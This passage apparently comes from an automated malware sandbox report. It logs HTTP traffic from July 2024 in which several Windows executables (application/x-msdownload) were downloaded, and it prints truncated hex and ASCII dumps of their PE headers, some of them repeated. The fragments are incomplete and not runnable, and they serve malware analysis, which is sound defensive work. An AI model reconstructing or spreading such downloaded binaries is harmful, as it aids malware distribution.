74 5a 9e 6c ba 5a bc aa 74 5a 9e 6c bb 5a ad aa 74 5a 9e 6c be 5a b8 aa 74 5a 9e 6c bd 5a b8 aa 74 5a 9e 6c b8 5a b8 aa 74 5a 52 69 63 68 b9 aa 74 5a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 06 00 be 3f 82 66 00 00 00 00 00 00 00 00 f0 00 22 20 0b 02 0b 00 00 d6 02 00 00 ec 01 00 00 00 00 00 70 d5 01 00 00 10 00 00 00 00 00 80 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 10 05 00 00 04 00 00 00 00 00 00 02 00 60 01 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 f0 b5 03 00 53 00 00 00 24 ab 03 00 28 00 00 00 00 d0 04 00 88 02 00 00 00 90 04 00 cc 30 00 00 00 00 00 00 00 00 00 00 00 e0 04 00 88 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 6d 03 00 70 00 00 00 00 00 00 00 00 00 00 00 00 f0 02 00 40 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 3c d4 02 00 00 10 00 00 00 d6 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 43 c6 00 00 00 f0 02 00 00 c8 00 00 00 da 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$tZtZtZuZtZEZtZ}oZtZ}oZtZ}oZtZlZtZlZtZlZtZlZtZlZtZRichtZPEd?f" p`S$(0mp@.text< `.rdataC
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 06 Jul 2024 11:27:09 GMTContent-Length: 88576Connection: keep-aliveLast-Modified: Thu, 06 Jun 2024 17:04:07 GMTETag: "15a00-61a3babc14dc4"Accept-Ranges: bytesCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Eqzmg44SpIW4n2Y4rdSXtOtIu7qV30K6WeUhteYKbZdvBLqQaBgpylrUWF24tIb%2BiSpcgqa54ZM82p29ABOe63BOsAntSee5ifySzbUpP0GPHwjLKVRWWndqqsH7q87Pm2EiGJiL3Wj6q%2BI%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 89ef3e72a9148c1d-EWRalt-svc: h3=":443"; ma=86400Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 46 0f 2c 83 02 6e 42 d0 02 6e 42 d0 02 6e 42 d0 02 6e 43 d0 96 6e 42 d0 fe 19 fb d0 11 6e 42 d0 fe 19 fe d0 03 6e 42 d0 c6 ab 8d d0 26 6e 42 d0 c6 ab 8c d0 54 6e 42 d0 c6 ab 8f d0 0b 6e 42 d0 25 a8 91 d0 05 6e 42 d0 25 a8 88 d0 03 6e 42 d0 25 a8 8e d0 03 6e 42 d0 52 69 63 68 02 6e 42 d0 00 00 00 00 00 00 00 00 50 45 00 00 64 86 05 00 07 ec 61 66 00 00 00 00 00 00 00 00 f0 00 22 20 0b 02 0b 00 00 be 00 00 00 bc 00 00 00 00 00 00 b0 34 00 00 00 10 00 00 00 00 00 80 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 a0 01 00 00 04 00 00 00 00 00 00 02 00 60 01 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 20 32 01 00 57 00 00 00 fc 26 01 00 78 00 00 00 00 00 00 00 00 00 00 00 00 80 01 00 f4 0b 00 00 00 00 00 00 00 00 00 00 00 90 01 00 4c 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 13 01 00 70 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 48 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 6f bd 00 00 00 10 00 00 00 be 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 77 62 00 00 00 d0 00 00 00 64 00 00 00 c2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 70 3c 00 00 00 40 01 00 00 1a 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$F,nBnBnBnCnBnBnB&nBTnBnB%nB%nB%nBRichnBPEdaf" 4` 2W&xL`pH.texto `.rdatawb
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKdate: Sat, 06 Jul 2024 11:27:15 GMTcontent-type: application/x-msdownloadcontent-length: 631296server: nginxlast-modified: Tue, 02 Jul 2024 08:39:04 GMTaccept-ranges: bytesconnection: closeData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 b8 dd ab b3 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 30 00 00 98 09 00 00 08 00 00 00 00 00 00 2e b7 09 00 00 20 00 00 00 c0 09 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 0a 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 b6 09 00 57 00 00 00 00 c0 09 00 c6 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 09 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 34 97 09 00 00 20 00 00 00 98 09 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 c6 04 00 00 00 c0 09 00 00 06 00 00 00 9a 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 e0 09 00 00 02 00 00 00 a0 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 b7 09 00 00 00 00 00 48 00 00 00 02 00 05 00 ec 67 07 00 e8 4e 02 00 01 00 00 00 1a 00 00 06 28 4c 00 00 c1 1b 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 28 70 00 00 06 2a 1e 02 28 10 00 00 0a 2a 1a 73 20 00 00 0a 7a 06 2a 7a 03 2c 13 02 7b 24 00 00 04 2c 0b 02 7b 24 00 00 04 6f 0d 00 00 0a 02 03 28 2a 00 00 0a 2a 2e 73 0e 00 00 06 80 25 00 00 04 2a 2e 73 15 00 00 06 80 2a 00 00 04 2a 1a 28 11 00 00 06 2a 1a 28 45 00 00 06 2a 5a 17 7e 08 00 00 04 7e 28 00 00 04 6f 2b 00 00 0a 28 40 00 00 06 2a 6a 7e 27 00 00 04 6f 2b 00 00 0a 28 27 00 00 06 28 50 00 00 0a 28 5c 00 00 06 2a 2e 73 1d 00 00 06 80 2f 00 00 04 2a 1a 28 53 00 00 06 2a 1a 28 2d 00 00 06 2a 7e 72 d2 12 00 70 28 02 00 00 06 80 33 00 00 04 72 d2 12 00 70 28 02 00 00 06 80 34 00 00 04 2a 72 73 4a 00 00 0a 80 35 00 00 04 7e 35 00 00 04 18 1d 6f 4b 00 00 0a 80 36 00 00 04 2a 62 7e 38 00 00 04 2c 10 7e 38 00 00 04 6f 91 00 00 0a 14 80 38 00 00 04 2a 2e 28 96 00 00 0a 2d 02 16 2a 17 2a 16 05 16 fe 01 2a de 17 73 b8 00 00 0a 16 6f b9 00 00 0a 28 ba 00 00 0a 14 fe 06 50 00 00 06 73 bb 00 00 0a 28 bc 00 00 0a 74 6b 00 00 01 28 bd 00 00 0a 20 f0 0f 00 00 28 be 00 00 0a 2a 7e 72 d
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKdate: Sat, 06 Jul 2024 11:27:17 GMTcontent-type: application/x-msdownloadcontent-length: 179200server: nginxlast-modified: Tue, 02 Jul 2024 10:09:37 GMTaccept-ranges: bytesconnection: closeData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 e3 77 83 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 08 00 00 b2 02 00 00 08 00 00 00 00 00 00 be d1 02 00 00 20 00 00 00 00 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 03 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 6c d1 02 00 4f 00 00 00 00 e0 02 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 03 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c4 b1 02 00 00 20 00 00 00 b2 02 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 00 06 00 00 00 e0 02 00 00 06 00 00 00 b4 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 00 03 00 00 02 00 00 00 ba 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 d1 02 00 00 00 00 00 48 00 00 00 02 00 05 00 d8 43 01 00 94 8d 01 00 03 00 02 00 fb 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0a 14 2a 00 06 2a 00 00 0a 14 2a 00 06 2a 00 00 1a 72 01 00 00 70 2a 00 06 2a 00 00 0a 16 2a 00 0a 16 2a 00 0a 16 2a 00 0a 16 2a 00 0a 16 2a 00 0a 16 2a 00 0a 16 2a 00 0a 16 2a 00 06 2a 00 00 06 2a 00 00 36 02 72 01 00 00 70 03 6f 11 00 00 06 2a 00 00 0a 14 2a 00 0a 14 2a 00 0a 03 2a 00 0a 14 2a 00 22 1f fe 73 5e 00 00 06 2a 00 00 00 3e 1f fe 73 66 00 00 06 25 02 7d 22 00 00 04 2a 0a 16 2a 00 0a 04 2a 00 13 30 05 00 17 00 00 00 01 00 00 11 73 03 00 00 0a 0a 02 06 16 16 16 6f 1d 00 00 06 06 6f 04 00 00 0a 2a 00 13 30 05 00 17 00 00 00 01 00 00 11 73 03 00 00 0a 0a 02 06 16 03 17 6f 1d 00 00 06 06 6f 04 00 00 0a 2a 00 1e 02 73 56 00 00 06 2a 32 02 6f 1e 00 00 06 73 52 00 00 06 2a 00 00 00 32 02 6f 1e 00 00 06 73 4c 00 00 06 2a 00 00 00 13 30 04 00 2f 00 00 00 02 00 00 11 23 00 00 00 00 00 00 00 00 0a 02 6f 06 00 00 06 20 a7 00 00 00 28 05 00 00 0a 12 00 28 06 00 00 0a 2c 02 06 2a 23 00 00 00 00 00 00 00 00 2a 00 4e 02 0f 01 28 05 00 00 0a 28 07 00 00 0a 6f 07 00 00 06 2a 22 02 6f 2
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKdate: Sat, 06 Jul 2024 11:27:18 GMTcontent-type: application/x-msdownloadcontent-length: 179200server: nginxlast-modified: Tue, 02 Jul 2024 10:09:37 GMTaccept-ranges: bytesconnection: closeData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 e3 77 83 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 08 00 00 b2 02 00 00 08 00 00 00 00 00 00 be d1 02 00 00 20 00 00 00 00 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 03 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 6c d1 02 00 4f 00 00 00 00 e0 02 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 03 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c4 b1 02 00 00 20 00 00 00 b2 02 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 00 06 00 00 00 e0 02 00 00 06 00 00 00 b4 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 00 03 00 00 02 00 00 00 ba 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 d1 02 00 00 00 00 00 48 00 00 00 02 00 05 00 d8 43 01 00 94 8d 01 00 03 00 02 00 fb 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0a 14 2a 00 06 2a 00 00 0a 14 2a 00 06 2a 00 00 1a 72 01 00 00 70 2a 00 06 2a 00 00 0a 16 2a 00 0a 16 2a 00 0a 16 2a 00 0a 16 2a 00 0a 16 2a 00 0a 16 2a 00 0a 16 2a 00 0a 16 2a 00 06 2a 00 00 06 2a 00 00 36 02 72 01 00 00 70 03 6f 11 00 00 06 2a 00 00 0a 14 2a 00 0a 14 2a 00 0a 03 2a 00 0a 14 2a 00 22 1f fe 73 5e 00 00 06 2a 00 00 00 3e 1f fe 73 66 00 00 06 25 02 7d 22 00 00 04 2a 0a 16 2a 00 0a 04 2a 00 13 30 05 00 17 00 00 00 01 00 00 11 73 03 00 00 0a 0a 02 06 16 16 16 6f 1d 00 00 06 06 6f 04 00 00 0a 2a 00 13 30 05 00 17 00 00 00 01 00 00 11 73 03 00 00 0a 0a 02 06 16 03 17 6f 1d 00 00 06 06 6f 04 00 00 0a 2a 00 1e 02 73 56 00 00 06 2a 32 02 6f 1e 00 00 06 73 52 00 00 06 2a 00 00 00 32 02 6f 1e 00 00 06 73 4c 00 00 06 2a 00 00 00 13 30 04 00 2f 00 00 00 02 00 00 11 23 00 00 00 00 00 00 00 00 0a 02 6f 06 00 00 06 20 a7 00 00 00 28 05 00 00 0a 12 00 28 06 00 00 0a 2c 02 06 2a 23 00 00 00 00 00 00 00 00 2a 00 4e 02 0f 01 28 05 00 00 0a 28 07 00 00 0a 6f 07 00 00 06 2a 22 02 6f 2
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKdate: Sat, 06 Jul 2024 11:27:19 GMTcontent-type: application/x-msdownloadcontent-length: 328192server: nginxlast-modified: Tue, 02 Jul 2024 17:49:14 GMTaccept-ranges: bytesconnection: closeData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 f4 3e b0 62 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 f6 04 00 00 0a 00 00 00 00 00 00 1e 15 05 00 00 20 00 00 00 20 05 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 60 05 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 cc 14 05 00 4f 00 00 00 00 20 05 00 16 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 05 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 24 f5 04 00 00 20 00 00 00 f6 04 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 16 06 00 00 00 20 05 00 00 08 00 00 00 f8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 40 05 00 00 02 00 00 00 00 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 15 05 00 00 00 00 00 48 00 00 00 02 00 05 00 74 ba 02 00 58 5a 02 00 03 00 02 00 82 04 00 06 bc b9 02 00 b8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff 40 bf 6f 17 03 71 77 e7 79 fc 70 4f 20 72 9c 50 00 00 00 05 00 00 00 01 00 00 00 57 00 00 00 05 00 00 00 01 01 00 00 53 00 00 00 05 00 00 00 11 00 00 00 5b 00 00 00 05 00 00 00 01 10 00 00 51 00 00 00 05 00 00 00 05 00 00 00 59 00 00 00 05 00 00 00 01 04 00 00 55 00 00 00 05 00 00 00 41 00 00 00 5d 00 00 00 05 00 00 00 01 40 00 00 50 00 00 00 05 00 00 00 03 00 00 00 58 00 00 00 05 00 00 00 01 02 00 00 54 00 00 00 05 00 00 00 21 00 00 00 5c 00 00 00 05 00 00 00 01 20 00 00 52 00 00 00 05 00 00 00 09 00 00 00 5a 00 00 00 05 00 00 00 01 08 00 00 56 00 00 00 05 00 00 00 81 00 00 00 c0 00 00 00 05 00 00 00 01 60 00 00 50 00 00 00 05 00 00 00 02 00 00 00 57 00 00 00 05 00 00 00 81 01 00 00 53 00 00 00 05 00 00 00 19 00 00 00 5b 00 00 00 05 00 00 00 01 18 00 00 51 00 00 00 05 00 00 00 07 00 00 00 59 00 00 00 05 00 00 00 01 06 00 00 55 00 00 00 05 00 00 00 61 00 00 00 5d 00 00 00 05 00 00 00 01 60 00 00 50 00 00 00 05 00 00 00 04 00 00 00 58 00 00 00 05 00 00 00 01 03 00 00 54 00 00 0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKdate: Sat, 06 Jul 2024 11:27:20 GMTcontent-type: application/x-msdownloadcontent-length: 48640server: nginxlast-modified: Wed, 03 Jul 2024 05:25:35 GMTaccept-ranges: bytesconnection: closeData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 e5 ad 2d 65 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 08 00 00 b2 00 00 00 0a 00 00 00 00 00 00 4e d0 00 00 00 20 00 00 00 e0 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 01 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 f4 cf 00 00 57 00 00 00 00 e0 00 00 ff 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 54 b0 00 00 00 20 00 00 00 b2 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 ff 07 00 00 00 e0 00 00 00 08 00 00 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 00 01 00 00 02 00 00 00 bc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 d0 00 00 00 00 00 00 48 00 00 00 02 00 05 00 f4 59 00 00 00 76 00 00 03 00 00 00 01 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bf eb 1e 56 fb cd 97 3b b2 19 02 24 30 a5 78 43 00 3d 56 44 d2 1e 62 b9 d4 f1 80 e7 e6 c3 39 41 2e 00 2f 00 5c 00 00 00 1e 02 28 18 00 00 0a 2a 1a 7e 13 00 00 04 2a 1e 02 80 13 00 00 04 2a 1a 7e 14 00 00 04 2a 1e 02 80 14 00 00 04 2a 1a 7e 15 00 00 04 2a 1e 02 80 15 00 00 04 2a 1a 7e 16 00 00 04 2a 1e 02 80 16 00 00 04 2a 1a 7e 17 00 00 04 2a 1e 02 80 17 00 00 04 2a 1a 7e 18 00 00 04 2a 1e 02 80 18 00 00 04 2a 1a 7e 19 00 00 04 2a 1e 02 80 19 00 00 04 2a 1a 7e 1a 00 00 04 2a 1a 7e 1b 00 00 04 2a 1e 02 80 1b 00 00 04 2a 1a 7e 1c 00 00 04 2a 1e 02 80 1c 00 00 04 2a 1a 7e 1d 00 00 04 2a 1e 02 80 1d 00 00 04 2a 2a 02 28 3e 00 00 0a 16 fe 03 2a 32 7e 0b 00 00 04 03 6f 3f 00 00 0a 2a 2e 73 18 00 00 0a 80 1a 00 00 04 2a e6 28 29 00 00 06 3a 28 00 00 00 28 2a 00 00 06 3a 1e 00 00 00 28 2b 00 00 06 3a 14 00 00 00 28 27 00 00 06 3a 0a 00 00 00 28 28 00 00 06 39 06 00 00 00 14 28 76 00 00 0a 2a 56 28 9c 00 00 0a 73 9d 00 00 0a 20 20 02 00 00 6f 9e 00 00 0a 2a 6e 7e 1e 00 00 04 39 10 00 00 00
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKdate: Sat, 06 Jul 2024 11:27:21 GMTcontent-type: application/x-msdownloadcontent-length: 48640server: nginxlast-modified: Wed, 03 Jul 2024 05:25:35 GMTaccept-ranges: bytesconnection: closeData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 e5 ad 2d 65 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 08 00 00 b2 00 00 00 0a 00 00 00 00 00 00 4e d0 00 00 00 20 00 00 00 e0 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 01 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 f4 cf 00 00 57 00 00 00 00 e0 00 00 ff 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 54 b0 00 00 00 20 00 00 00 b2 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 ff 07 00 00 00 e0 00 00 00 08 00 00 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 00 01 00 00 02 00 00 00 bc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 d0 00 00 00 00 00 00 48 00 00 00 02 00 05 00 f4 59 00 00 00 76 00 00 03 00 00 00 01 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bf eb 1e 56 fb cd 97 3b b2 19 02 24 30 a5 78 43 00 3d 56 44 d2 1e 62 b9 d4 f1 80 e7 e6 c3 39 41 2e 00 2f 00 5c 00 00 00 1e 02 28 18 00 00 0a 2a 1a 7e 13 00 00 04 2a 1e 02 80 13 00 00 04 2a 1a 7e 14 00 00 04 2a 1e 02 80 14 00 00 04 2a 1a 7e 15 00 00 04 2a 1e 02 80 15 00 00 